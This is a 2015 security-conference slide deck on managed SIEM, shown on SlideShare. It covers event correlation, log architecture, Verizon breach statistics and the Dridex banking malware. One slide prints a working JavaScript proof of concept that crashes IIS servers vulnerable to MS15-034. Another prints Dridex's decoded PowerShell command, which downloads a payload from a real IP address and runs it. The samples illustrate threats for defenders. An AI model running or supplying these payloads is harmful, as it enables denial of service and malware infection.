SlideShare a Scribd company logo
2015 Security Conference
Security, Information and
Event Management (SIEM)
Paul Dutot IEng MIET MBCS CITP QSTM OSCP
2015 Security Conference
Who Am I
• Head of Penetration Testing and SIEM within
Security Department @ Logicalis Jersey.
• Tiger Scheme accredited Penetration Tester.
• Certified in McAfee ESM and Vulnerability
Manager.
• My role is a mix of ethical hacking and using those
skills to provide Managed SIEM to our clients.
• Founder member of the CIISF and secretary of the
Jersey BCS branch.
• Incorporated Engineer (IEng) / Chartered IT Professional (CITP).
2015 Security Conference
Our clients
• Managed SIEM Incident Response – World Wide Engineering
Company in 68 countries.
• Managed SIEM - Fortune 100 American Financial Business –
23,000 IP’s in 26 countries.
• Managed SIEM for SMB’s – ranging from customers with 2
firewalls to 30 devices under management.
And everything in between………
All managed by staff at Logicalis In Jersey
2015 Security Conference
What we shall talk about…
• SIEM Concepts
• What is SIEM. What does it solve?
• Meet the Dridex Malware
• Questions
• SIEM Architectures
• SIEM Features At A Glance
• Business Risks – Where are the threats?
2015 Security Conference
Business Risks – Risks by Category
2014 2015
Source: Verizon Data Breach report
2015 Security Conference
Business Risks – Incident Categorization by Industry Sector
Source: Verizon Data Breach report
2015 Security Conference
MS 15-034 - How Fast the Bad Guys Move…
Microsoft patch for MS15-034 to reversed engineered exploit for sale on the Darknet < 6 days.
<script>
/*
Name: IISer.htm
Description: Crashes a Windows IIS host vulnerable to
MS15-034
Author: Malik Mesellem (@MME_IT)
*/
//Variables
var ip = "10.0.1.1";
var file = "welcome.png"; //For W2K8R2
// var file = "iis-85.png"; //For W2K12R2
var payload = "bytes=18-18446744073709551615";
//Tested on W2K8R2 and W2K12R2
var xmlhttp = new XMLHttpRequest();
//Sends the HTTP request 10 times
for (i = 0; i < 10; i++){
xmlhttp.open("GET", "http://" + ip + "/" + file, true);
xmlhttp.setRequestHeader("Range", payload);
xmlhttp.send();
}
alert("Bye bye IIS!");
</script>
http://pastebin.com/SbN55M2H
2015 Security Conference
“ 90% of all incidents is people. Whether
it’s goofing up, getting infected, behaving
badly or losing stuff, most incidents fall
into the PEBKAC (Problem Exists Between
Keyboard and Chair) and ID-10T (idiot)
uber patterns.”
“Financial Motivation is also alive and
well in phishing attacks. The old
method of duping people into
providing their personnel identification
number or bank information is still
around but the targets are largely
individuals versus organizations.
Phishing with the intent of device
compromise is certainly present.”
Business Risks – Final Thoughts
Source: Verizon Data Breach report
Since October 2014, Jersey and
Guernsey companies across all sectors
have been targeted by the ‘Dridex’
malware through email phishing.
2015 Security Conference
What is SIEM? What issues does it solve?
SIEM is the Evolution and Integration
of Two Distinct Technologies
 Security Event Management (SEM)
― Primarily focused on Collecting and
Aggregating Security Events
 Security Information Management (SIM)
― Primarily focused on the Enrichment,
Normalization, and Correlation of
Security Events
Security Information & Event
Management (SIEM) is a Set
of Technologies for:
 Log Data Collection
 Correlation
 Aggregation
 Normalization
 Retention
 Analysis and Workflow
Three Major Factors Driving the Majority of SIEM Implementations
1
Real-Time
Threat Visibility 2
Security
Operational
Efficiency
3
Compliance and/or Log
Management Requirements
2015 Security Conference
SIEM Concepts – Visibility Problem
FACT: A small network with 20 Desktops will produce an
average 46 events per second (EPS) = 165,600 per hour
= 3,974,400 per diem. Bursts of events are 1.5 times
this figure.
Do you fancy trying to investigate that
amount of events for a security issue?
2015 Security Conference
SIEM Concepts – Compliance Problem
PCI-DSS Compliance is one of the main drivers for a SIEM solution.
Meeting Section 10 – Logging Requirements is almost impossible without a SIEM!
There are at least 20 use cases to use SIEM to meet aspects of PCI-DSS – see
http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/
2015 Security Conference
SIEM Concepts – Anatomy of an Event / Flow Life
Raw Logs / Flows
<164>Apr 15 2015 10:04:53:
%ASA-4-106023: Deny tcp src
InsideLAN:192.168.4.35/50381 dst
Outside:216.41.215.186/80 by
access-group "inside_in" [0x0, 0x0]
Raw Logs stored and forensically
tagged.
Raw logs are normalised.
Log Processed by Correlation
Engine
Raw logs stored in raw format.
Security Alert !!
• Events come from devices
such as workstations,
routers , AD servers and
security devices.
• Flows come from flow
collectors or flow
enabled devices such as
firewalls.
• Lots of different flow types
supported such as Netflow /
Qflow.
• Lots of different device
types and logging options.
Normalisation = the process of
getting different record formats
from different devices into a
common format.
SIEM solutions are sized by
capacity in term of Events Per
Second (EPS) primarily.
2015 Security Conference
SIEM Concepts – Correlation
• Correlation is the process of looking at
events to determine relevance and
relationships to other events within the
network for example successful login after
brute force.
• It can be applied in real time and historical
modes with a variety of rule types.
• 175+ Correlation rules enabled by default.
• Correlation enables us to gain visibility
into other non traditional IT systems such
as Access Control and BMS.
• Correlation rules combined with Watch
Lists allow us to track security incidents in
real time such as a malware infection.
2015 Security Conference
SIEM Architecture – ESM / REC / ELM
ELM
Servers Wireless
Access Points
Main Office
VPN Endpoints
IDS / IPS
Switches / Routers
Linux
Desktops
Receiver
ESM
• Events / Flows arrive at the receiver.
• Raw logs are tagged and stored in
the Enterprise Log Manager (ELM).
• Normalisation and Correlation takes
place in the Enterprise Security
Manager (ESM).
• Log collection can be in various
formats (Syslog / SDEE for example).
• Desktop collection cane be agent
based such as OSSEC HIDS or
agentless e.g. WMI.
• Solution can be ‘Cloud’ or ‘On
Premise’ or a ‘Hybrid’ with high
availability.
2015 Security Conference
12 3
SIEM Features – At A Glance
• Powerful Investigation of Events –
find what is important in 3 clicks.
• Case Management of Incidents.
• Automate responses to Incidents.
• API to Interrogate / Update SIEM.
• Anomaly Behaviour Detection.
• Custom Dashboards and Powerful
Reporting.
• Zone Management.
• Integration with Threat Intelligence
Feeds – Public and Private.
• Data Enrichment allows us to
further augment log content.
2015 Security Conference
Why use a Logicalis Managed SIEM solution?
• Expertise – Logicalis Jersey is the World Wide security centre of
excellence for Logicalis Group.
• Cost.
• Flexible consumption models.
• Strategic Partners.
• ISO27001 Certified.
• Redundant Data Centres in Jersey
and Guernsey resolving jurisdictional
data issues.
• Our multi tenanted solution ensures
data segregation at all levels.
2015 Security Conference
Meet Dridex – Banking Malware
cmd /K PowerShell.exe (New-Object
System.Net.WebClient).DownloadFile('http://92.63.
88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf
hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab
%TEMP%JIOiodfhioIH.exe; start
%TEMP%JIOiodfhioIH.exe;
It has code hidden in Excel spreadsheet
VBA macro virus with hidden URL
When decoded it
becomes…..
Feb 2015: Only 3 out of
57 AV Engines detected
it.
Apr 20-15 : 39 out of 55
2015 Security Conference
Dridex C2
Server
Operator
File Server
AD Domain
Server
Database
Server
Higher Level
Hacker
ACME Trust – Anatomy of a Compromise
Database Server credentials are
obtained and the Database Server is
compromised. Data exfiltration begins..
Eventually AD compromised = network
compromised. You could find out like
this……
Malware installs a Key Logger
and a Remote Access Trojan
(RAT).
Access sold to higher level
hacker. Hacker uses already
compromised credentials
to upload Trojan versions /
documents to the file
server using credentials
obtained via key logger.
2015 Security Conference
Real Reputational Damage
http://dpaste.dzfl.pl/866433ffd07a
2015 Security Conference
Demo Time
Bypassing Anti Virus using Windows
Powershell in Excel
2015 Security Conference
One for the Defenders
Hunting Malware with SysInternals Suite
Video
https://www.youtube.com/watch?v=Wuy_Pm3KaV8
PowerPoint
video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx
“When combining the results from all four AV engines, less than
40% of the binaries were detected.”
Source:
CAMP: Content-Agnostic Malware Protection
Proceedings of 20th Annual Network & Distributed System Security Symposium
2015 Security Conference
Thank You
Questions

More Related Content

PDF
From SIEM to SA: The Path Forward
 
PDF
SIEM evolution
PPTX
7 Reasons your existing SIEM is not enough
PPTX
Security Information Event Management - nullhyd
PDF
Top Cybersecurity Threats and How SIEM Protects Against Them
PDF
SIEM vs Log Management - Data Security Solutions 2011
PPTX
Got SIEM? Now what? Getting SIEM Work For You
PPTX
So You Got That SIEM. NOW What Do You Do?  by Dr. Anton Chuvakin
From SIEM to SA: The Path Forward
 
SIEM evolution
7 Reasons your existing SIEM is not enough
Security Information Event Management - nullhyd
Top Cybersecurity Threats and How SIEM Protects Against Them
SIEM vs Log Management - Data Security Solutions 2011
Got SIEM? Now what? Getting SIEM Work For You
So You Got That SIEM. NOW What Do You Do?  by Dr. Anton Chuvakin

What's hot (20)

PPT
MISTI Infosec 2010- SIEM Implementation
PPTX
Security Monitoring using SIEM null bangalore meet april 2015
PDF
Kofax Document Security
PDF
IBM QRadar Security Intelligence Overview
PDF
2012-12-12 Seminar McAfee ESM
PDF
SIEM brochure A4 8pp FINAL WEB
PPTX
Post Wannacry Update
PDF
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
PPTX
Cloud risk and business continuity v21
PPTX
Leveraging Compliance for Security with SIEM and Log Management
PDF
SIEM enabled risk management , SOC and GRC v1.0
PPTX
Technology Overview - Validation & ID Protection (VIP)
PPTX
McAfee - Enterprise Security Manager (ESM) - SIEM
PDF
IBM QRadar Security Intelligence Overview
PPTX
Making Log Data Useful: SIEM and Log Management Together
PPSX
HP ArcSight
PDF
IBM Qradar
PDF
IBM-QRadar-Corporate-Online-Training.
PDF
IBM Security Immune System
PDF
IBM Security Software Solutions - Powerpoint
MISTI Infosec 2010- SIEM Implementation
Security Monitoring using SIEM null bangalore meet april 2015
Kofax Document Security
IBM QRadar Security Intelligence Overview
2012-12-12 Seminar McAfee ESM
SIEM brochure A4 8pp FINAL WEB
Post Wannacry Update
ITCamp 2018 - Tobiasz Koprowski - Secure your data at rest - on demand, now!
Cloud risk and business continuity v21
Leveraging Compliance for Security with SIEM and Log Management
SIEM enabled risk management , SOC and GRC v1.0
Technology Overview - Validation & ID Protection (VIP)
McAfee - Enterprise Security Manager (ESM) - SIEM
IBM QRadar Security Intelligence Overview
Making Log Data Useful: SIEM and Log Management Together
HP ArcSight
IBM Qradar
IBM-QRadar-Corporate-Online-Training.
IBM Security Immune System
IBM Security Software Solutions - Powerpoint
Ad

Similar to Logicalis Security Conference (20)

PPTX
SIEM - Activating Defense through Response by Ankur Vats
PPTX
Security Information and Event Management (SIEM)
PDF
Log Analytics for Distributed Microservices
PPTX
Effective Security Monitoring for IBM i: What You Need to Know
PPTX
Security Information Event Management Security Information Event Management
PPTX
Add-Structure-and-Credibility-to-Your-Security-Portfolio-with-CIS-Controls-v8...
PDF
Ibm ofa ottawa_ how_secure_is_your_data_eric_offenberg
PDF
Ibm ofa ottawa_ how_secure_is_your_data_eric_offenberg
PDF
SIEM evaluator guide for soc analyst
PPTX
EventLog Analyzer - Product overview
PDF
2023-09-28 aMS Montpellier CIS 365.pdf
PPTX
.conf Go Zurich 2022 - Security Session
PDF
In Cloud We Encrypt #GHC15
PPTX
SIEM - Your Complete IT Security Arsenal
PPTX
Introduction to SIEM.pptx
PDF
5-Ways-To-Future-Proof-Your-SIEM-Securonix[1].pdf
PDF
Cloud Security for Startups - From A to E(xit)
PDF
Cso 4any ram rev 2.6 management summary
PDF
Slide Griffin - Practical Attacks and Mitigations
PPT
Intellinx.z watch
SIEM - Activating Defense through Response by Ankur Vats
Security Information and Event Management (SIEM)
Log Analytics for Distributed Microservices
Effective Security Monitoring for IBM i: What You Need to Know
Security Information Event Management Security Information Event Management
Add-Structure-and-Credibility-to-Your-Security-Portfolio-with-CIS-Controls-v8...
Ibm ofa ottawa_ how_secure_is_your_data_eric_offenberg
Ibm ofa ottawa_ how_secure_is_your_data_eric_offenberg
SIEM evaluator guide for soc analyst
EventLog Analyzer - Product overview
2023-09-28 aMS Montpellier CIS 365.pdf
.conf Go Zurich 2022 - Security Session
In Cloud We Encrypt #GHC15
SIEM - Your Complete IT Security Arsenal
Introduction to SIEM.pptx
5-Ways-To-Future-Proof-Your-SIEM-Securonix[1].pdf
Cloud Security for Startups - From A to E(xit)
Cso 4any ram rev 2.6 management summary
Slide Griffin - Practical Attacks and Mitigations
Intellinx.z watch
Ad

More from Paul Dutot IEng MIET MBCS CITP OSCP CSTM (10)

PPTX
Welcome to the #WannaCry Wine Club
PPTX
Scanning Channel Islands Cyberspace
PPTX
Incident Response in the wake of Dear CEO
ODP
Exploiting buffer overflows
PDF
ODP
A Letter from Anonymous to the Jersey Finance Industry
PDF
WI-FI Security in Jersey 2011
Welcome to the #WannaCry Wine Club
Scanning Channel Islands Cyberspace
Incident Response in the wake of Dear CEO
Exploiting buffer overflows
A Letter from Anonymous to the Jersey Finance Industry
WI-FI Security in Jersey 2011

Recently uploaded (20)

PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PPTX
20250228 LYD VKU AI Blended-Learning.pptx
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
Empathic Computing: Creating Shared Understanding
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
PPTX
Spectroscopy.pptx food analysis technology
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PPTX
sap open course for s4hana steps from ECC to s4
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
MIND Revenue Release Quarter 2 2025 Press Release
PDF
cuic standard and advanced reporting.pdf
“AI and Expert System Decision Support & Business Intelligence Systems”
Building Integrated photovoltaic BIPV_UPV.pdf
20250228 LYD VKU AI Blended-Learning.pptx
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Network Security Unit 5.pdf for BCA BBA.
The Rise and Fall of 3GPP – Time for a Sabbatical?
Empathic Computing: Creating Shared Understanding
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
Chapter 3 Spatial Domain Image Processing.pdf
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
Diabetes mellitus diagnosis method based random forest with bat algorithm
Spectroscopy.pptx food analysis technology
Digital-Transformation-Roadmap-for-Companies.pptx
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
sap open course for s4hana steps from ECC to s4
Understanding_Digital_Forensics_Presentation.pptx
MIND Revenue Release Quarter 2 2025 Press Release
cuic standard and advanced reporting.pdf

Logicalis Security Conference

  • 1. 2015 Security Conference Security, Information and Event Management (SIEM) Paul Dutot IEng MIET MBCS CITP QSTM OSCP
  • 2. 2015 Security Conference Who Am I • Head of Penetration Testing and SIEM within Security Department @ Logicalis Jersey. • Tiger Scheme accredited Penetration Tester. • Certified in McAfee ESM and Vulnerability Manager. • My role is a mix of ethical hacking and using those skills to provide Managed SIEM to our clients. • Founder member of the CIISF and secretary of the Jersey BCS branch. • Incorporated Engineer (IEng) / Chartered IT Professional (CITP).
  • 3. 2015 Security Conference Our clients • Managed SIEM Incident Response – World Wide Engineering Company in 68 countries. • Managed SIEM - Fortune 100 American Financial Business – 23,000 IP’s in 26 countries. • Managed SIEM for SMB’s – ranging from customers with 2 firewalls to 30 devices under management. And everything in between……… All managed by staff at Logicalis In Jersey
  • 4. 2015 Security Conference What we shall talk about… • SIEM Concepts • What is SIEM. What does it solve? • Meet the Dridex Malware • Questions • SIEM Architectures • SIEM Features At A Glance • Business Risks – Where are the threats?
  • 5. 2015 Security Conference Business Risks – Risks by Category 2014 2015 Source: Verizon Data Breach report
  • 6. 2015 Security Conference Business Risks – Incident Categorization by Industry Sector Source: Verizon Data Breach report
  • 7. 2015 Security Conference MS 15-034 - How Fast the Bad Guys Move… Microsoft patch for MS15-034 to reversed engineered exploit for sale on the Darknet < 6 days. <script> /* Name: IISer.htm Description: Crashes a Windows IIS host vulnerable to MS15-034 Author: Malik Mesellem (@MME_IT) */ //Variables var ip = "10.0.1.1"; var file = "welcome.png"; //For W2K8R2 // var file = "iis-85.png"; //For W2K12R2 var payload = "bytes=18-18446744073709551615"; //Tested on W2K8R2 and W2K12R2 var xmlhttp = new XMLHttpRequest(); //Sends the HTTP request 10 times for (i = 0; i < 10; i++){ xmlhttp.open("GET", "http://" + ip + "/" + file, true); xmlhttp.setRequestHeader("Range", payload); xmlhttp.send(); } alert("Bye bye IIS!"); </script> http://pastebin.com/SbN55M2H
  • 8. 2015 Security Conference “ 90% of all incidents is people. Whether it’s goofing up, getting infected, behaving badly or losing stuff, most incidents fall into the PEBKAC (Problem Exists Between Keyboard and Chair) and ID-10T (idiot) uber patterns.” “Financial Motivation is also alive and well in phishing attacks. The old method of duping people into providing their personnel identification number or bank information is still around but the targets are largely individuals versus organizations. Phishing with the intent of device compromise is certainly present.” Business Risks – Final Thoughts Source: Verizon Data Breach report Since October 2014, Jersey and Guernsey companies across all sectors have been targeted by the ‘Dridex’ malware through email phishing.
  • 9. 2015 Security Conference What is SIEM? What issues does it solve? SIEM is the Evolution and Integration of Two Distinct Technologies  Security Event Management (SEM) ― Primarily focused on Collecting and Aggregating Security Events  Security Information Management (SIM) ― Primarily focused on the Enrichment, Normalization, and Correlation of Security Events Security Information & Event Management (SIEM) is a Set of Technologies for:  Log Data Collection  Correlation  Aggregation  Normalization  Retention  Analysis and Workflow Three Major Factors Driving the Majority of SIEM Implementations 1 Real-Time Threat Visibility 2 Security Operational Efficiency 3 Compliance and/or Log Management Requirements
  • 10. 2015 Security Conference SIEM Concepts – Visibility Problem FACT: A small network with 20 Desktops will produce an average 46 events per second (EPS) = 165,600 per hour = 3,974,400 per diem. Bursts of events are 1.5 times this figure. Do you fancy trying to investigate that amount of events for a security issue?
  • 11. 2015 Security Conference SIEM Concepts – Compliance Problem PCI-DSS Compliance is one of the main drivers for a SIEM solution. Meeting Section 10 – Logging Requirements is almost impossible without a SIEM! There are at least 20 use cases to use SIEM to meet aspects of PCI-DSS – see http://resources.infosecinstitute.com/siem-use-cases-pci-dss-3-0-part-1/
  • 12. 2015 Security Conference SIEM Concepts – Anatomy of an Event / Flow Life Raw Logs / Flows <164>Apr 15 2015 10:04:53: %ASA-4-106023: Deny tcp src InsideLAN:192.168.4.35/50381 dst Outside:216.41.215.186/80 by access-group "inside_in" [0x0, 0x0] Raw Logs stored and forensically tagged. Raw logs are normalised. Log Processed by Correlation Engine Raw logs stored in raw format. Security Alert !! • Events come from devices such as workstations, routers , AD servers and security devices. • Flows come from flow collectors or flow enabled devices such as firewalls. • Lots of different flow types supported such as Netflow / Qflow. • Lots of different device types and logging options. Normalisation = the process of getting different record formats from different devices into a common format. SIEM solutions are sized by capacity in term of Events Per Second (EPS) primarily.
  • 13. 2015 Security Conference SIEM Concepts – Correlation • Correlation is the process of looking at events to determine relevance and relationships to other events within the network for example successful login after brute force. • It can be applied in real time and historical modes with a variety of rule types. • 175+ Correlation rules enabled by default. • Correlation enables us to gain visibility into other non traditional IT systems such as Access Control and BMS. • Correlation rules combined with Watch Lists allow us to track security incidents in real time such as a malware infection.
  • 14. 2015 Security Conference SIEM Architecture – ESM / REC / ELM ELM Servers Wireless Access Points Main Office VPN Endpoints IDS / IPS Switches / Routers Linux Desktops Receiver ESM • Events / Flows arrive at the receiver. • Raw logs are tagged and stored in the Enterprise Log Manager (ELM). • Normalisation and Correlation takes place in the Enterprise Security Manager (ESM). • Log collection can be in various formats (Syslog / SDEE for example). • Desktop collection cane be agent based such as OSSEC HIDS or agentless e.g. WMI. • Solution can be ‘Cloud’ or ‘On Premise’ or a ‘Hybrid’ with high availability.
  • 15. 2015 Security Conference 12 3 SIEM Features – At A Glance • Powerful Investigation of Events – find what is important in 3 clicks. • Case Management of Incidents. • Automate responses to Incidents. • API to Interrogate / Update SIEM. • Anomaly Behaviour Detection. • Custom Dashboards and Powerful Reporting. • Zone Management. • Integration with Threat Intelligence Feeds – Public and Private. • Data Enrichment allows us to further augment log content.
  • 16. 2015 Security Conference Why use a Logicalis Managed SIEM solution? • Expertise – Logicalis Jersey is the World Wide security centre of excellence for Logicalis Group. • Cost. • Flexible consumption models. • Strategic Partners. • ISO27001 Certified. • Redundant Data Centres in Jersey and Guernsey resolving jurisdictional data issues. • Our multi tenanted solution ensures data segregation at all levels.
  • 17. 2015 Security Conference Meet Dridex – Banking Malware cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63. 88.63/kwefewef/fgdsee/dxzq.jpg','%TEMP%JIOiodf hioIH.cab'); expand %TEMP%JIOiodfhioIH.cab %TEMP%JIOiodfhioIH.exe; start %TEMP%JIOiodfhioIH.exe; It has code hidden in Excel spreadsheet VBA macro virus with hidden URL When decoded it becomes….. Feb 2015: Only 3 out of 57 AV Engines detected it. Apr 20-15 : 39 out of 55
  • 18. 2015 Security Conference Dridex C2 Server Operator File Server AD Domain Server Database Server Higher Level Hacker ACME Trust – Anatomy of a Compromise Database Server credentials are obtained and the Database Server is compromised. Data exfiltration begins.. Eventually AD compromised = network compromised. You could find out like this…… Malware installs a Key Logger and a Remote Access Trojan (RAT). Access sold to higher level hacker. Hacker uses already compromised credentials to upload Trojan versions / documents to the file server using credentials obtained via key logger.
  • 19. 2015 Security Conference Real Reputational Damage http://dpaste.dzfl.pl/866433ffd07a
  • 20. 2015 Security Conference Demo Time Bypassing Anti Virus using Windows Powershell in Excel
  • 21. 2015 Security Conference One for the Defenders Hunting Malware with SysInternals Suite Video https://www.youtube.com/watch?v=Wuy_Pm3KaV8 PowerPoint video.ch9.ms/sessions/teched/na/2014/DCIM-B368.pptx “When combining the results from all four AV engines, less than 40% of the binaries were detected.” Source: CAMP: Content-Agnostic Malware Protection Proceedings of 20th Annual Network & Distributed System Security Symposium